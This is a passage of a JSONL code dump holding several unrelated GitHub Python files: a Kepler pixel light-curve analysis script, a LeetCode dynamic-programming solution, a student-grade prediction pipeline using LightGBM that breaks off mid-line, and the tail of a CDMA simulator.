konfiguracja.read('tylkoPrzebiegiCzasowe') == False:\n print(\"snr {}, eb/n0 {}, ile bledow: {}, {}%\".format(snr, ebn0, ber, berProcent))\n \n wyniki.append(ber)\n return ebn0Tab, wyniki\n","repo_name":"kfigon/SymulatorMcCdma","sub_path":"kontroler.py","file_name":"kontroler.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71358811927","text":"import numpy as np\nfrom astropy.convolution import convolve, Box1DKernel, Gaussian1DKernel\nfrom astropy.timeseries import LombScargle\nimport smoothing \nimport matplotlib.gridspec as gridspec\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom lightkurve import search_targetpixelfile, LightkurveWarning\nimport nancleaner as nc\nfrom matplotlib.backends.backend_pdf import PdfPages as pdf\nimport argparse, warnings, sys\n\nwarnings.simplefilter('ignore', category=UserWarning) # for font conflicts on my system, at least\n# warnings.simplefilter('ignore', category=LightkurveWarning) # if it's trying to download an empty quarter, code will quit\n\nmpl.rc('text', usetex=True)\nmpl.rcParams['text.latex.preamble'] = [\n r'\\usepackage{helvet}',\n r'\\usepackage[EULERGREEK]{sansmath}',\n r'\\sansmath'\n]\nmpl.rcParams['axes.formatter.useoffset'] = False\nmpl.rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nmpl.rcParams['ps.useafm'] = True\nmpl.rcParams['pdf.use14corefonts'] = True\n\nparser = argparse.ArgumentParser(description='Examine light curves and amplitude spectra of each individual pixel.')\nparser.add_argument('-k', '--kic', required=True, type=int, help='KIC ID')\nparser.add_argument('-q', '--quarter', required=True, type=int, choices=range(0,18), help='Quarter to analyse')\nparser.add_argument('-t', '--timecadence', default='long', choices=['long', 'short'], type=str, help='Cadence of data to use')\nparser.add_argument('-s', '--smoothing', dest='kern', default=100, type=int, help='Gaussian smoothing kernel, in days')\nparser.add_argument('-c', '--clip', dest='inp', default=3, type=int, help='Outlier clipping level, in sigma')\nparser.add_argument('-o', '--oversampling', dest='over', default=5, type=int, help='LSP oversampling factor')\nparser.add_argument('-n', '--nyquistfactor', dest='nyq', default=1, type=float, help='LSP Nyquist factor')\nparser.add_argument('-m', '--makepdf', default=False, type=bool, help='Make PDF of pixel close-ups?')\nparser.add_argument('-e', '--export', default=False, type=bool, help='Export data for each pixel?')\nparser.add_argument('-p', '--plots', dest='show', default=False, type=bool, help='Show plots?')\n\nparams = parser.parse_args()\n\nq = params.quarter\nkic = params.kic\ncadence = params.timecadence\n\nwhile True:\n tpf = search_targetpixelfile(f'KIC {kic}', quarter=q, cadence=cadence).download()\n if tpf == None:\n print('No data for this quarter.')\n sys.exit()\n else:\n break\n\nchannel = tpf.channel\nobj_ra = tpf.ra\nobj_dec = tpf.dec\ntable = tpf.hdu[1].data\nflux = table['FLUX']\ntime = table['TIME']\nhd1 = tpf.hdu[1].header\nysize = hd1['NAXIS2']\ntable2 = tpf.hdu[2].data\nhd2 = tpf.hdu[2].header\nx = hd2['NAXIS1']\ny = hd2['NAXIS2']\nxsize = x * y\ntemp2d = np.zeros((x, y))\n\nif (channel%2) == 0:\n eo = 0\nelse:\n eo = 1\n\n# dynamic variable names\nfor (j, k), img in np.ndenumerate(temp2d):\n index = (k + 1) * j + (x - j) * k\n exec(\"pixel%d_flux = np.array(None)\" % index)\n exec(\"pixel%d_time = np.array(None)\" % index)\n\n# filling the flux array\nsecond_flux = np.zeros([xsize, ysize])\nfor (i, j, k), val in np.ndenumerate(flux):\n index = (j + 1) * k + (x - k) * j\n second_flux[index, i] = val\n\nfor (j, k), img in np.ndenumerate(table2):\n index = (j + 1) * k + (x - k) * j\n if img == 0:\n pass\n else:\n tempflux1, temptime = nc.nancleaner2d(second_flux[index,:], time)\n tempflux, smth_flux = smoothing.gausssmooth(temptime, tempflux1, params.kern)\n\n clip = params.inp * np.std(tempflux)\n meanflux = np.mean(tempflux)\n \n upperbound = meanflux + clip\n lowerbound = meanflux - clip\n\n colours = np.zeros(tempflux.size)\n\n for i, flux in enumerate(tempflux):\n if flux < upperbound and flux > lowerbound:\n colours[i] = 1\n\n clipped_flux = []\n clipped_time = []\n for i, colour in enumerate(colours):\n if colour == 1:\n clipped_flux.append(tempflux[i])\n clipped_time.append(temptime[i])\n\n exec(\"pixel%d_flux = clipped_flux\" % index)\n exec(\"pixel%d_time = clipped_time\" % index)\n \n # export smoothed and clipped data as .dat file\n if params.export == True:\n exportblend = np.array([clipped_time, clipped_flux])\n exportblend = np.transpose(exportblend)\n np.savetxt(f'kic{kic}_pixel{index+1}_lc.dat', exportblend, delimiter=' ', header=f'Smoothed and clipped light curve for KIC{kic} TPF')\n else:\n pass\n\n # fourier transform\n\n ofac = params.over\n hifac = params.nyq\n\n frequencies, power_spectrum = LombScargle(np.asarray(clipped_time), np.asarray(clipped_flux)).autopower(method='fast', normalization='psd', samples_per_peak=ofac, nyquist_factor=1)\n if cadence == 'long':\n maxcpd = 24.4598\n elif cadence == 'short':\n maxcpd = 734.0535\n hifac *= maxcpd/max(frequencies)\n frequencies, power_spectrum = LombScargle(np.asarray(clipped_time), np.asarray(clipped_flux)).autopower(method='fast', normalization='psd', samples_per_peak=ofac, nyquist_factor=hifac)\n power_spectrum = power_spectrum * 4. / len(clipped_time)\n power_spectrum = np.sqrt(power_spectrum)\n power_spectrum *= 1e6\n frequencies *= 11.57\n\n exec(\"pixel%d_freq = frequencies\" % index)\n exec(\"pixel%d_ps = power_spectrum\" % index)\n\n\n### PLOTTING ###\n\n# light curves\nfig = plt.figure(1)\ngs = gridspec.GridSpec(y, x, wspace=0, hspace=0)\nplt.title(f'{kic}')\nplt.xlabel('Time (d)')\nplt.ylabel('Fractional Intensity')\n\nax1 = plt.gca()\nax1.get_xaxis().set_ticks([])\nax1.get_yaxis().set_ticks([])\n\nfor (j, k), img in np.ndenumerate(table2):\n index = (j + 1) * k + (x - k) * j\n if img == 0:\n if eo == 0:\n ax = fig.add_subplot(gs[y - j - 1, x - k - 1])\n elif eo == 1:\n ax = fig.add_subplot(gs[y - j - 1, k])\n ax.set_xticklabels('')\n ax.set_yticklabels('')\n else:\n exec(\"flux = pixel%d_flux\" % index)\n exec(\"time = pixel%d_time\" % index)\n if eo == 0:\n ax = fig.add_subplot(gs[y - j - 1, x - k - 1])\n elif eo == 1:\n ax = fig.add_subplot(gs[y - j - 1, k])\n ax.set_xticklabels('')\n ax.set_yticklabels('')\n if img == np.amax(table2):\n lower = np.zeros(len(time))\n upper = lower + max(flux)\n ax.fill_between(time, lower, upper, facecolor='#ff99a3')\n plt.plot(time, flux, 'k.', ms=0.1)\n plt.ylim(min(flux), max(flux)) #ymin=0)\n plt.xlim(min(time), max(time))\n else:\n plt.plot(time, flux, 'k.', ms=0.1)\n plt.ylim(min(flux), max(flux)) #ymin=0)\n plt.xlim(min(time), max(time))\n\nplt.savefig(f'kic{kic}q{q}pixelslc_{cadence}.png')\n\nif params.makepdf == True:\n outplot = pdf(f'kic{kic}_q{q}_{cadence}.pdf')\nelse:\n pass\n\n# power spectra\nfig = plt.figure(2)\ngs = gridspec.GridSpec(y, x, wspace=0, hspace=0)\nplt.title(f'{kic}')\nplt.xlabel('Frequency ($\\mu$Hz)')\nplt.ylabel('Amplitude (ppm)')\n\nax0 = plt.gca()\nax0.get_xaxis().set_ticks([])\nax0.get_yaxis().set_ticks([])\n\nfor (j, k), img in np.ndenumerate(table2):\n index = (j + 1) * k + (x - k) * j\n if img == 0:\n if eo == 0:\n ax = fig.add_subplot(gs[y - j - 1, x - k - 1])\n elif eo == 1:\n ax = fig.add_subplot(gs[y - j - 1, k])\n ax.set_xticklabels('')\n ax.set_yticklabels('')\n else:\n exec(\"freq = pixel%d_freq\" % index)\n exec(\"ps = pixel%d_ps\" % index)\n if eo == 0:\n ax = fig.add_subplot(gs[y - j - 1, x - k - 1])\n elif eo == 1:\n ax = fig.add_subplot(gs[y - j - 1, k])\n ax.set_xticklabels('')\n ax.set_yticklabels('')\n if img == np.amax(table2):\n lower = np.zeros(len(freq))\n upper = lower + max(ps)\n ax.fill_between(freq, lower, upper, facecolor='#ff99a3')\n plt.plot(freq, ps, 'k-', lw=0.5)\n plt.ylim(0, max(ps)) #ymin=0)\n plt.xlim(0, max(freq))\n else:\n plt.plot(freq, ps, 'k-', lw=0.5)\n plt.ylim(0, max(ps)) #ymin=0)\n plt.xlim(0, max(freq))\n\n# fig.set_size_inches(14,10) # for clarity, but disabled for quick look run of code\nplt.savefig(f'kic{kic}q{q}pixels_{cadence}.png')\n\nif params.makepdf == True:\n # power spectra 2\n fig = plt.figure(3)\n gs = gridspec.GridSpec(y, x, wspace=0, hspace=0)\n plt.title(f'{kic}')\n plt.xlabel('Frequency ($\\mu$Hz)')\n plt.ylabel('Amplitude (ppm)')\n\n ax0 = plt.gca()\n ax0.get_xaxis().set_ticks([])\n ax0.get_yaxis().set_ticks([])\n\n for (j, k), img in np.ndenumerate(table2):\n index = (j + 1) * k + (x - k) * j\n if img == 0:\n if eo == 0:\n ax = fig.add_subplot(gs[y - j - 1, x - k - 1])\n elif eo == 1:\n ax = fig.add_subplot(gs[y - j - 1, k])\n ax.set_xticklabels('')\n ax.set_yticklabels('')\n else:\n exec(\"freq = pixel%d_freq\" % index)\n exec(\"ps = pixel%d_ps\" % index)\n if eo == 0:\n ax = fig.add_subplot(gs[y - j - 1, x - k - 1])\n elif eo == 1:\n ax = fig.add_subplot(gs[y - j - 1, k])\n ax.set_xticklabels('')\n ax.set_yticklabels('')\n if img == np.amax(table2):\n lower = np.zeros(len(freq))\n upper = lower + max(ps)\n ax.fill_between(freq, lower, upper, facecolor='#ff99a3')\n plt.plot(freq, ps, 'k-', lw=0.5)\n plt.annotate(index,xy=(max(freq)/2, max(ps)/2))\n plt.ylim(0, max(ps)) #ymin=0)\n plt.xlim(0, max(freq))\n else:\n plt.plot(freq, ps, 'k-', lw=0.5)\n plt.annotate(index,xy=(max(freq)/2, max(ps)/2))\n plt.ylim(0, max(ps)) #ymin=0)\n plt.xlim(0, max(freq))\n outplot.savefig(fig)\n\n # pixels\n for (j, k), img in np.ndenumerate(table2):\n index = (j + 1) * k + (x - k) * j\n if img == 0:\n pass\n else:\n exec(\"flux = pixel%d_flux\" % index)\n exec(\"time = pixel%d_time\" % index)\n exec(\"freq = pixel%d_freq\" % index)\n exec(\"ps = pixel%d_ps\" % index)\n if img == np.amax(table2):\n fig, ax = plt.subplots(2,1)\n plt.title(index)\n ax[0].plot(time, flux, 'k.', ms=1)\n ax[0].set_ylim(min(flux), max(flux)) #ymin=0)\n ax[0].set_xlim(min(time), max(time))\n ax[1].plot(freq, ps, 'k-', lw=0.5)\n ax[1].set_ylim(0, max(ps)) #ymin=0)\n ax[1].set_xlim(0, max(freq))\n ax[0].set_xlabel('time (d)')\n ax[0].set_ylabel('fractional intensity')\n ax[1].set_xlabel('freq ($\\mu$Hz)')\n ax[1].set_ylabel('amplitude (ppm)')\n plt.tight_layout()\n outplot.savefig(fig)\n else:\n fig, ax = plt.subplots(2,1)\n plt.title(index)\n ax[0].plot(time, flux, 'k.', ms=1, alpha=0.5)\n ax[0].set_ylim(min(flux), max(flux)) #ymin=0)\n ax[0].set_xlim(min(time), max(time))\n ax[1].plot(freq, ps, 'k-', lw=0.5, alpha=0.5)\n ax[1].set_ylim(0, max(ps)) #ymin=0)\n ax[1].set_xlim(0, max(freq))\n ax[0].set_xlabel('time (d)')\n ax[0].set_ylabel('fractional intensity')\n ax[1].set_xlabel('freq ($\\mu$Hz)')\n ax[1].set_ylabel('amplitude (ppm)')\n plt.tight_layout()\n outplot.savefig(fig)\n outplot.close()\nelse:\n pass\n\nif params.show == True:\n plt.show()\nelse:\n pass\n","repo_name":"astrobel/chancealignments2","sub_path":"4_pixels.py","file_name":"4_pixels.py","file_ext":"py","file_size_in_byte":11385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"11015706606","text":"class Solution:\n def maxUncrossedLines(self, A, B) -> int:\n if not A or not B:\n return 0\n\n dp = [[0 for _ in range(len(B)+1)] for _ in range(len(A)+1)]\n print(dp)\n max_num = 0\n for i in range(1, len(A)+1):\n for j in range(1, len(B)+1):\n if A[i-1] == B[j-1]:\n dp[i][j] = dp[i-1][j-1] + 1\n else:\n dp[i][j] = max(dp[i][j - 1], dp[i - 1][j])\n # max_num = max(max_num, dp[i][j])\n\n # print(dp)\n return dp[-1][-1]\n\n\n\n\nA = [1,3,7,1,7,5]\nB = [1,9,2,5,1]\ns = Solution()\nprint(s.maxUncrossedLines(A, B))","repo_name":"NeilWangziyu/Leetcode_py","sub_path":"maxUncrossedLines.py","file_name":"maxUncrossedLines.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"3854447786","text":"# coding: utf-8\n# pylint: disable = invalid-name, C0111\n#~/opt/anaconda3/bin/conda install pandas\n\nfrom __future__ import division\n\nimport itertools\nimport json\nimport pandas as pd\nimport pickle\nimport lightgbm as lgb\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_curve, auc\nimport matplotlib.pyplot as plt\nfrom fancyimpute import BiScaler, KNN, NuclearNormMinimization, SoftImpute\n\n\nfrom sklearn.metrics import confusion_matrix\nfrom imblearn.over_sampling import SMOTE\n\n\npd.set_option(\"display.max_rows\", 100)\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n print(cm)\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.tight_layout()\n\ndef convert_str(value):\n return str(value)\n\ndef convert_float(value):\n return np.float(value)\n# load or create your dataset\nprint('Load data...')\n# # # 数学成绩\nmath_df = pd.read_pickle(\"data/math_df.pkl\")\nmath_df = math_df.reset_index()\n\n# # 刷卡记录月统计\nprint(\"*************刷卡月记录开始*************\")\n# food_count_df = pd.read_pickle(\"data/food_count_df.pkl\")\nhotwater_count_df_09 = pd.read_pickle(\"data/hotwater_count_df.pkl\")\nlibrary_count_df_09 = pd.read_pickle(\"data/library_count_df.pkl\")\n# shower_count_df = pd.read_pickle(\"data/shower_count_df.pkl\")\n# columns名字与学期月数一致,方便组合两个年级\nhotwater_count_df_09.columns = np.arange(1,35)\nlibrary_count_df_09.columns = np.arange(1,35)\n\n\n\n# food_count_df_10 = pd.read_pickle(\"data/food_count_df_10.pkl\")\nhotwater_count_df_10 = pd.read_pickle(\"data/hotwater_count_df_10.pkl\").drop([\"2010-07\", \"2010-08\"],axis=1)\nlibrary_count_df_10 = pd.read_pickle(\"data/library_count_df_10.pkl\").drop([\"2010-07\", \"2010-08\"],axis=1)\n\n# columns名字与学期月数一致,方便组合两个年级\nhotwater_count_df_10.columns = np.arange(1,35)\nlibrary_count_df_10.columns = np.arange(1,35)\n\n# shower_count_df_10 = pd.read_pickle(\"data/shower_count_df_10.pkl\")\n\n# 将两个年级的刷卡记录组装\nhotwater_count_df= pd.concat([hotwater_count_df_09,hotwater_count_df_10])\nlibrary_count_df = pd.concat([library_count_df_09,library_count_df_10])\n# print(\"hotwater_count_df\",\"\\n\",hotwater_count_df)\n# print(\"library_count_df\",\"\\n\",library_count_df)\n\nprint(\"*************刷卡月记录组装完毕*************\")\n\n# # # 真实熵\nprint(\"*************AE组装开始*************\")\n# reset_index:把学号从df中提取出来\nshower_ae_df_09 = pd.read_pickle(\"data/shower_ae_df.pkl\").reset_index()\nmeal_ae_df_09 = pd.read_pickle(\"data/meal_ae_df.pkl\").reset_index()\nshower_ae_df_10 = pd.read_pickle(\"data/shower_ae_df_10.pkl\").reset_index()\nmeal_ae_df_10 = pd.read_pickle(\"data/meal_ae_df_10.pkl\").reset_index()\n\nmeal_ae_df = pd.concat([meal_ae_df_09,meal_ae_df_09])\nshower_ae_df= pd.concat([shower_ae_df_09,shower_ae_df_10])\n# print(\"meal_ae_df\",\"\\n\",meal_ae_df)\n# print(\"shower_ae_df\",\"\\n\",shower_ae_df)\nprint(\"*************AE组装完毕*************\")\n# Prediction\nfood_prediction_df_09 = pd.read_pickle(\"data/prediction_ae_countList/prediction_food09.pkl\")\nfood_prediction_df_10 = pd.read_pickle(\"data/prediction_ae_countList/prediction_food10.pkl\")\nshower_prediction_df_09 = pd.read_pickle(\"data/prediction_ae_countList/prediction_shower09.pkl\")\nshower_prediction_df_10 = pd.read_pickle(\"data/prediction_ae_countList/prediction_shower10.pkl\")\n\n\nprediction_df_09 = food_prediction_df_09.join(shower_prediction_df_09,how=\"outer\",lsuffix=\"_fd\",rsuffix=\"_shwr\")\nprediction_df_10 = food_prediction_df_10.join(shower_prediction_df_10,how=\"outer\",lsuffix=\"_fd\",rsuffix=\"_shwr\")\n\nprediction_df = pd.concat([prediction_df_09,prediction_df_10])\n\n# print(\"prediction_df_09\\n\",prediction_df_09)\n# print(\"prediction_df_10\\n\",prediction_df_10)\n# print(\"prediction_df\\n\",prediction_df)\n# print(\"prediction_df\\n\",prediction_df.columns)\n\n# 总成绩\nprint(\"*************总成绩组装开始*************\")\n\ntotal_df_09 = pd.read_pickle(\"data/total_df.pkl\")\n# total_df_09['label'] = total_df_09['2011-2012_2'].map(lambda x:( x>= 70 and False ) or (x<70 and True))\ntotal_df_10 = pd.read_pickle(\"data/total_df_10.pkl\")\n# total_df_10['label'] = total_df_10['2012-2013_2'].map(lambda x:( x>= 70 and False ) or (x<70 and True))\n\n\ntotal_df_09.columns = [1,2,3,4,5,6,\"sid\"]\ntotal_df_10.columns = [1,2,3,4,5,6,\"sid\"]\n\ndef score_to_flag(x):\n if x>=70:\n return 0\n else:\n return 1\ntotal_df_09['label'] = total_df_09[6].map(score_to_flag)\ntotal_df_10['label'] = total_df_10[6].map(score_to_flag)\n\ntotal_df = pd.concat([total_df_09, total_df_10])\n# print(\"total_df\",\"\\n\",total_df)\nprint(\"*************总成绩组装完毕*************\")\n\n\n\n# 数据预处理\n# label: 成绩布尔化,及格/不及格\n\n# feature:\n# 第一学期每月刷卡次数\n# print(\"hotwater_count_df\\n\",hotwater_count_df)\nsems1 = np.arange(1,13)\n# food_count_feature_df = food_count_df[sems1]\nhotwater_count_feature_df = hotwater_count_df[sems1].reset_index()\nlibrary_count_feature_df = library_count_df[sems1].reset_index()\n# shower_count_feature_df = shower_count_df[sems1]\n# print(\"hotwater_count_feature_df\\n\",hotwater_count_feature_df)\n\n# 所有的学号转化为str\nlibrary_count_feature_df['index'] = library_count_feature_df['index'].apply(convert_str)\nhotwater_count_feature_df['index'] = hotwater_count_feature_df['index'].apply(convert_str)\nshower_ae_df[0] = shower_ae_df[0].apply(convert_str)\nmeal_ae_df[0] = meal_ae_df[0].apply(convert_str)\nmath_df[\"index\"] = math_df[\"index\"].apply(convert_str)\ntotal_df[\"sid\"]=total_df[\"sid\"].apply(convert_str)\n\n# print(\"math_df\\n\",math_df)\nmath_df = math_df[[\"cal1_f\",\"linear_f\",\"linear_m\",\"cal1_m\",\"index\"]]\nmath_df[\"cal1_f\"] = math_df[\"cal1_f\"].apply(convert_float)\nmath_df[\"linear_f\"] = math_df[\"linear_f\"].apply(convert_float)\nmath_df[\"linear_m\"] = math_df[\"linear_m\"].apply(convert_float)\nmath_df[\"cal1_m\"] = math_df[\"cal1_m\"].apply(convert_float)\n# feature-label_df\n# 连��\n\n# x = np.intersect1d(math_df[\"index\"],meal_ae_df[0])\n# print(\"&&&&&&&&&&&&&&&&&&&&&x\",len(x))\n\n\nres = total_df.join(library_count_feature_df.set_index(\"index\"), on=\"sid\", how=\"outer\",sort=True,rsuffix=\"_lib\")\nres = res.join(hotwater_count_feature_df.set_index(\"index\"),on=\"sid\", how=\"left\", sort=True,rsuffix=\"_hw\")\nres = res.join(shower_ae_df.set_index(0), on=\"sid\", how=\"left\", sort=True,rsuffix=\"_shwr\")\nres = res.join(math_df.set_index(\"index\"), on=\"sid\", sort=True, how=\"left\", rsuffix=\"_mth\")\n# res = res.join(prediction_df, on=\"sid\", sort=True, how=\"left\")\n\n# 宇宙大拼接之后,没有清除掉NAN值之前的dataset\nprint(\"本次清理NAN前总数******************: \" , res.shape[0])\n\n# 加上之后prediction后,所有的feature\nall_feature_1 = ['1_score', '2_score', '3_score', '4_score', '5_score', '6_score', 'sid', 'label', '1_lib', '2_lib', '3_lib',\n '4_lib', '5_lib', '6_lib', '7_lib', '8_lib', '9_lib', '10_lib', '11_lib', '12_lib', '1_hw', '2_hw',\n '3_hw', '4_hw', '5_hw', '6_hw', '7_hw', '8_hw', '9_hw', '10_hw', '11_hw', '12_hw',\n '1_shwr', '2_shwr', '3_shwr', '4_shwr', '5_shwr', '6_shwr', 'cal1_f',\n 'linear_f', 'linear_m', 'cal1_m', 'sems1ae_fd', 'sems1ae_shwr',\n 'sems1count_fd', 'sems1count_shwr', 'sems1pred_fd', 'sems1pred_shwr',\n 'sems2ae_fd', 'sems2ae_shwr', 'sems2count_fd', 'sems2count_shwr',\n 'sems2pred_fd', 'sems2pred_shwr', 'sems3ae_fd', 'sems3ae_shwr',\n 'sems3count_fd', 'sems3count_shwr', 'sems3pred_fd', 'sems3pred_shwr',\n 'sems4ae_fd', 'sems4ae_shwr', 'sems4count_fd', 'sems4count_shwr',\n 'sems4pred_fd', 'sems4pred_shwr', 'sems5ae_fd', 'sems5ae_shwr',\n 'sems5count_fd', 'sems5count_shwr', 'sems5pred_fd', 'sems5pred_shwr',\n 'sems6ae_fd', 'sems6ae_shwr', 'sems6count_fd', 'sems6count_shwr',\n 'sems6pred_fd', 'sems6pred_shwr', 'semsfoodpred']\n# 不加上之后prediction后,所有的的feature\nall_feature_2 = ['1_score', '2_score', '3_score', '4_score', '5_score', '6_score', 'sid', 'label', '1_lib', '2_lib', '3_lib',\n '4_lib', '5_lib', '6_lib', '7_lib', '8_lib', '9_lib', '10_lib', '11_lib', '12_lib', '1_hw', '2_hw',\n '3_hw', '4_hw', '5_hw', '6_hw', '7_hw', '8_hw', '9_hw', '10_hw', '11_hw', '12_hw',\n '1_shwr', '2_shwr', '3_shwr', '4_shwr', '5_shwr', '6_shwr', 'cal1_f',\n 'linear_f', 'linear_m', 'cal1_m']\nall_feature = all_feature_1\n\n# 加上之后prediction后,需要去掉的feature\ndrop_feature_1 = ['2_shwr','3_shwr','4_shwr','5_shwr','6_shwr',\n # 'sems1pred_fd','sems2pred_fd','sems3pred_fd','sems4pred_fd','sems5pred_fd','sems6pred_fd',\n # 'sems1ae_fd','sems2ae_fd','sems3ae_fd','sems4ae_fd','sems5ae_fd','sems6ae_fd',\n \"sems1ae_fd\", \"sems1count_fd\", \"sems1pred_fd\", \"sems2ae_fd\", \"sems2count_fd\",\"sems2pred_fd\",\n \"sems3ae_fd\", \"sems3count_fd\", \"sems3pred_fd\", \"sems4ae_fd\", \"sems4count_fd\",\"sems4pred_fd\",\n \"sems5ae_fd\", \"sems5count_fd\", \"sems5pred_fd\", \"sems6ae_fd\", \"sems6count_fd\",\"sems6pred_fd\",\n \"sems1ae_shwr\", \"sems1count_shwr\", \"sems1pred_shwr\", \"sems2ae_shwr\", \"sems2count_shwr\", \"sems2pred_shwr\",\n \"sems3ae_shwr\", \"sems3count_shwr\", \"sems3pred_shwr\", \"sems4ae_shwr\", \"sems4count_shwr\", \"sems4pred_shwr\",\n \"sems5ae_shwr\", \"sems5count_shwr\", \"sems5pred_shwr\", \"sems6ae_shwr\", \"sems6count_shwr\", \"sems6pred_shwr\",\n \"semsfoodpred\"]\n# 不加上之后prediction后,需要去掉的feature\ndrop_feature_2 = ['2_shwr','3_shwr','4_shwr','5_shwr','6_shwr',\"sid\",'3_score','4_score','5_score','6_score']\n\n# 选择本次需要使用的feature\n# drop_label = [\"label\",\"sid\",'1_score','2_score','3_score','4_score','5_score','6_score']\nall_feature = all_feature_2\ndrop_feature = drop_feature_2\n\nselected_feature = np.setdiff1d(all_feature,drop_feature)\nres.columns = all_feature\n\n# 去掉不用的feature\nres = res.drop(drop_feature,axis =1 )\n\n# 通过数学成绩对学生分成及格、不及格两类,进而填充缺失值\nres_false = res.loc[res[\"cal1_f\"]>=70]\nres_true = res.loc[res[\"cal1_f\"]<0]\nprint(\"res_false\",res_false)\nprint(\"res_true\",res_true)\n\n# 用对应类型的数学平均成绩来填充缺失的值\n# for i,r in res_false.iteritems():\n# if i== \"label\":\n# continue\n# res_false[i] = res_false[i].fillna(res_false[i].mean())\n# for i,r in res_true.iteritems():\n# if i== \"label\":\n# continue\n# # print(res_true[i],r)\n# res_true[i] = res_true[i].fillna(res_true[i].mean())\n#\n# res = pd.concat([res_false,res_true])\n# # res.dropna(how=\"any\",axis=1)\n# print(\"res.columns\\n\",res.columns,\"len(res)\",res.shape)\n\nres = res.fillna(0)\nprint(\"all_label+++++++++++++\\n\",all_feature)\nprint(\"缺失值数量统计:\\n\",res.isnull().sum(axis = 0))\nres = res.fillna(0)\n# del_li = []\n# for idx,item in res.iterrows():\n# na = item.isnull().sum()\n# # print(idx,':' ,na)\n# if na > 10:\n# del_li.append(idx)\n# res.drop(del_li,axis=0, inplace=True)\n# res = pd.DataFrame(KNN(k=5).fit_transform(res), columns=res.columns)\n# print(\"缺失值数量统计:\\n\",res.isnull().sum(axis = 0))\n# print(res)\n\nres =res[~res.isin([np.nan, np.inf, -np.inf]).any(1)]\nprint(\"res*********************res.shape\\n\", res.shape)\nprint(\"组装完成...\")\na = res[selected_feature].drop([\"label\"], axis = 1)\nX_train, X_test, y_train, y_test = \\\n train_test_split(a, res[\"label\"], test_size=0.2, random_state=19931028)\n# train = res.sample(frac=0.8,random_state=5,replace=False, axis=0)\n# test = res[~res.index.isin(train.index)]\nprint(\"res*********************train.shape\\n\", X_train.columns)\n\n# X_train = train.drop(drop_label,axis = 1)\n# X_test = test.drop(drop_label,axis = 1)\n# print(\"装载 feature label...\")\n# y_train = train[\"label\"].map(lambda x: bool(x))\n# y_test = test[\"label\"].map(lambda x: bool(x))\n#\nprint(\"本次预测使用的标签******************: \", selected_feature)\nprint(\"本次样本总数******************: \" , res.shape[0])\n# train = res[:]\n# test = res[3001:]\n# _y_train = train['label'] # training label\n# y_test = test['label'] # testing label\n# _X_train = train.loc[:, feature] # training dataset\n# X_test = test.loc[:, feature] # testing dataset\n\n# X_train = feature.sample(frac=0.65,random_state=9,replace=False, axis=0)\n# X_test = feature[~feature.index.isin(X_train.index)]\n# y_train = label[label.index.isin(X_train.index)]\n# y_test = label[~label.index.isin(y_train.index)]\n\n\nnum = 0\nm = 0\nwhat =0\nfor i in y_train.to_list():\n if i == True:\n num = num+1\n elif i == False:\n m = m+1\n else:\n what+=1\n\nprint(\"原始train:正例======\",num,\"反例=======\",m, \"ratio:\",num/(num+m),\"what:\", what)\nsm = SMOTE(random_state=42, sampling_strategy= 0.9)\nX_train, y_train = sm.fit_resample(X_train, y_train)\n\nnum = 0\nm = 0\nfor i in y_train.to_list():\n if i == True:\n num = num+1\n if i == False:\n m = m+1\nprint(\"train:正例======\",num,\"反例=======\",m, \"ratio:\",num/(num+m))\nnum = 0\nm = 0\nfor i in y_test.to_list():\n if i == True:\n num = num+1\n if i == False:\n m = m+1\nprint(\"test:正例======\",num,\"test=======\",m, \"ratio:\",num/(num+m))\n\n#create dataset for lightgbm\nlgb_train = lgb.Dataset(X_train, y_train)\nlgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train)\n\n\n\n# specify your configurations as a dict\nparams = {\n 'task': 'train',\n 'boosting_type': 'gbdt',\n 'objective': 'binary',\n 'metric': {'binary_logloss'},\n 'num_leaves': 63,\n 'num_trees': 100,\n 'learning_rate': 0.01,\n 'feature_fraction': 0.9,\n 'bagging_fraction': 0.8,\n 'bagging_freq': 5,\n 'verbose': 0\n}\n\n# number of leaves,will be used in feature transformation\nnum_leaf = 63\n\n\nprint('Start training...')\n# train\ngbm = lgb.train(params,\n lgb_train,\n num_boost_round=100,\n valid_sets=lgb_train)\n\nprint('Save model...')\n# save model to file\ngbm.save_model('model.txt')\n\nprint('Start predicting...')\n# predict and get data on leaves, training data\ny_pred = gbm.predict(X_train,pred_leaf=True)\n\n# feature transformation and write result\nprint('Writing transformed training data')\ntransformed_training_matrix = np.zeros([len(y_pred),len(y_pred[0]) * num_leaf],dtype=np.int64)\nfor i in range(0,len(y_pred)):\n temp = np.arange(len(y_pred[0])) * num_leaf - 1 + np.array(y_pred[i])\n transformed_training_matrix[i][temp] += 1\n\n#for i in range(0,len(y_pred)):\n#\tfor j in range(0,len(y_pred[i])):\n#\t\ttransformed_training_matrix[i][j * num_leaf + y_pred[i][j]-1] = 1\n\n# predict and get data on leaves, testing data\ny_pred = gbm.predict(X_test,pred_leaf=True)\n\n# feature transformation and write result\nprint('Writing transformed testing data')\ntransformed_testing_matrix = np.zeros([len(y_pred),len(y_pred[0]) * 